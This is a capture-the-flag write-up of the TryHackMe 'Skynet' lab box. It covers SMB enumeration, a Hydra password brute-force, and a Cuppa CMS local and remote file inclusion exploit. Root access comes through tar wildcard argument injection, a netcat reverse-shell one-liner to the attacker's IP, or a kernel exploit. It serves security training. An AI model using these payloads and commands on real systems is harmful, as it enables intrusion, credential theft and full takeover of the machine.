CTF-Writeups/TryHackMe/Skynet.md
2020-10-26 18:47:38 +05:00

470 lines
No EOL
23 KiB
Markdown

# TryHackMe-Skynet
>Abdullah Rizwan , Sunday 25th October,05:36 PM
## NMAP
```
Nmap scan report for 10.10.209.122
Host is up (0.18s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL TOP RESP-CODES CAPA AUTH-RESP-CODE PIPELINING UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: capabilities SASL-IR Pre-login IDLE IMAP4rev1 have OK ID LOGIN-REFERRALS listed LOGINDISABLEDA0001 more ENABLE LITERAL+ post-lo
gin
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2020-10-25T07:36:04-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-25T12:36:04
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.50 seconds
```
From the nmap result we can see the following ports are open
* PORT 22
* PORT 80
* PORT 110
* PORT 445
which we can enumerate
#### PORT 445
```
root@kali:~/TryHackMe/Easy/Skynet# smbmap -u anonymous -H 10.10.209.122
[+] Guest session IP: 10.10.209.122:445 Name: 10.10.209.122
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson NO ACCESS Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
```
Here we can see only `anonymous` share is readable
```
smbclient \\\\10.10.209.122\\anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Sep 18 09:41:20 2019
.. D 0 Tue Sep 17 12:20:17 2019
attention.txt N 163 Wed Sep 18 08:04:59 2019
logs D 0 Wed Sep 18 09:42:16 2019
books D 0 Wed Sep 18 09:40:06 2019
9204224 blocks of size 1024. 5372244 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
```
`A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
`
Head over to `\logs` in smbshare here you will find 3 text files
```
smb: \> cd logs
smb: \logs\> dir
. D 0 Wed Sep 18 09:42:16 2019
.. D 0 Wed Sep 18 09:41:20 2019
log2.txt N 0 Wed Sep 18 09:42:13 2019
log1.txt N 471 Wed Sep 18 09:41:59 2019
log3.txt N 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5373956 blocks available
```
This pretty much doesn't give anything
<img src="https://imgur.com/BhCvZTb.png"/>
Only `log1.txt` has some potential passwords
#### PORT 80
<img src="https://imgur.com/MY4U2SZ.png"/>
#### Gobuster
```
gobuster dir -u http://10.10.209.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.209.122
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/25 18:03:31 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
Progress: 21226 / 220561 (9.62%)
```
<img src="https://imgur.com/5NRiqKF.png"/>
hydra -l miles -P log1.txt http-post-from 10.10.209.122 "/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Unknown user or password incorrect."
#### Hydra
```
root@kali:~/TryHackMe/Easy/Skynet# hydra -l milesdyson -P log1.txt 10.10.209.122 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Login:Unknown user or password incorrect." -V
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-25 18:24:12
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.209.122:80/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Login:Unknown user or password incorrect.
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "cyborg007haloterminator" - 1 of 31 [child 0] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator22596" - 2 of 31 [child 1] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator219" - 3 of 31 [child 2] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator20" - 4 of 31 [child 3] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1989" - 5 of 31 [child 4] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1988" - 6 of 31 [child 5] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator168" - 7 of 31 [child 6] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator16" - 8 of 31 [child 7] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator143" - 9 of 31 [child 8] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator13" - 10 of 31 [child 9] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator123!@#" - 11 of 31 [child 10] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1056" - 12 of 31 [child 11] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator101" - 13 of 31 [child 12] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator10" - 14 of 31 [child 13] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator02" - 15 of 31 [child 14] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator00" - 16 of 31 [child 15] (0/0)
[80][http-post-form] host: 10.10.209.122 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-25 18:24:24
```
username :`milesdyson` password: `cyborg007haloterminator`
<img src="https://imgur.com/Ncul0Xr.png"/>
```
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
```
Now we go back to smb shares
```
smbmap -u milesdyson -p ')s{A&2Z=F^n_E.B`' -H 10.10.209.122
[+] IP: 10.10.209.122:445 Name: 10.10.209.122
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
anonymous READ ONLY Skynet Anonymous Share
milesdyson READ ONLY Miles Dyson Personal Share
IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
```
`smbclient \\\\10.10.209.122\\milesdyson -U milesdyson` enter password ``` )s{A&2Z=F^n_E.B` ```
```
smb: \> dir
. D 0 Tue Sep 17 14:05:47 2019
.. D 0 Wed Sep 18 08:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:05:14 2019
notes D 0 Tue Sep 17 14:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:05:14 2019
9204224 blocks of size 1024. 5367008 blocks available
```
We see `notes` directory
```
smb: \> cd notes [9/775]
smb: \notes\> dir
. D 0 Tue Sep 17 14:18:40 2019
.. D 0 Tue Sep 17 14:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:01:29 2019
important.txt N 117 Tue Sep 17 14:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:01:29 2019
```
Reading the contents of `important.txt`
```
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```
Again running gobuster on the hidden directory
```
gobuster dir -u http://10.10.209.122/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.209.122/45kra24zxs28v3yd/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/25 19:08:35 Starting gobuster
===============================================================
/administrator (Status: 301)
Progress: 6554 / 220561 (2.97%)
```
<img src="https://imgur.com/JlUajdI.png"/>
```
searchsploit cuppa
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
------------------------------------------------------------------------------------------------------------------ ---------------------------------
```
We can see that
```
An attacker can exploit this issue with a browser.
The following example URIs are available:
http://www.example.com/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://www.example.com/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
```
So using the concept of RFI (Remote File Inclusion) we can include a any remote file since LFI (Local File Inclusion) vulnerability exists.
#### LFI
`http://10.10.209.122/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd`
#### RFI
Grab a reverse shell from pentest monkey `https://github.com/pentestmonkey/php-reverse-shell`
Change the ip and port and then start a http server along with a listener
`nc -lvp [port]`
`python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... `
`10.10.209.122/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.3.143:8000/php-reverse-shell.php`
This will be your RFI
#### Reverse Shell
<img src="https://imgur.com/wEh4NC6.png"/>
#### Privilege Escalation
###### Method 1
<img src="https://imgur.com/jB592jJ.png"/>
Here we can see `tar cf /home/milesdyson/backups/backup.tgz *` so this wildcard makes this command to be vulnerable
https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
Execute these commands on the target machine
mkfifo /tmp/lhennp; nc 10.14.3.143 5555 0</tmp/lhennp | /bin/bash >/tmp/lhennp 2>&1; rm /tmp/lhennp
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
Then set up netcat listener
nc -lvp 5555
```
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 80
drwxr-xr-x 8 www-data www-data 4096 Oct 26 08:26 .
drwxr-xr-x 3 root root 4096 Sep 17 2019 ..
drwxr-xr-x 3 www-data www-data 4096 Sep 17 2019 45kra24zxs28v3yd
drwxr-xr-x 2 www-data www-data 4096 Sep 17 2019 admin
drwxr-xr-x 3 www-data www-data 4096 Sep 17 2019 ai
-rw-rw-rw- 1 www-data www-data 0 Oct 26 08:02 archive.tar
-rw-rw-rw- 1 www-data www-data 1 Oct 26 08:02 --checkpoint=1
-rw-rw-rw- 1 www-data www-data 1 Oct 26 08:02 --checkpoint-action=exec=sh shell.sh
drwxr-xr-x 2 www-data www-data 4096 Sep 17 2019 config
drwxr-xr-x 2 www-data www-data 4096 Sep 17 2019 css
-rw-r--r-- 1 www-data www-data 25015 Sep 17 2019 image.png
-rw-r--r-- 1 www-data www-data 523 Sep 17 2019 index.html
drwxr-xr-x 2 www-data www-data 4096 Sep 17 2019 js
-rwxrwxrwx 1 www-data www-data 100 Oct 26 08:26 shell.sh
-rw-r--r-- 1 www-data www-data 2667 Sep 17 2019 style.css
cd /root
ls -la
total 28
drwx------ 4 root root 4096 Sep 17 2019 .
drwxr-xr-x 23 root root 4096 Sep 18 2019 ..
lrwxrwxrwx 1 root root 9 Sep 17 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwx------ 2 root root 4096 Sep 17 2019 .cache
drwxr-xr-x 2 root root 4096 Sep 17 2019 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Sep 17 2019 root.txt
```
###### Method 2
You can go the other way around in rooting the box by checking the kernel version
```
www-data@skynet:/home/milesdyson$ uname -vr
4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
www-data@skynet:/home/milesdyson$ uname
Linux
www-data@skynet:/home/milesdyson$ uname -vvv
#63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
www-data@skynet:/home/milesdyson$
```
Here the kernel version is `4.8.0` nad ubuntu version is `16.04.1`
```
root@kali:~/TryHackMe/Medium/Skynet# searchsploit 4.8.0
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) | linux/remote/42695.rb
eToolz 3.4.8.0 - Denial of Service (PoC) | windows_x86-64/dos/45797.py
Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow | windows/remote/10269.html
iCAM Workstation Control 4.8.0.0 - Authentication Bypass | windows/local/32158.txt
Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit) | linux/local/44654.rb
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel 4.8.0-22/3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference | linux/dos/40762.c
Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation | linux/local/47168.c
Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation | linux/local/41994.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR | linux/local/47169.c
phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery | php/webapps/44496.html
Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) | windows/local/48695.py
------------------------------------------------------------------------------------------------------------------ ---------------------------------
```
Here `Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation` stands perfect exploit
copy to your directory or download it from `exploit-db` then host it on your local machine
<img src="https://imgur.com/c1Ab3ge.png"/>
Compile the program
<img src="https://imgur.com/orxmNU0.png"/>
<img src="https://imgur.com/WndsGFD.png"/>
And you got root !!!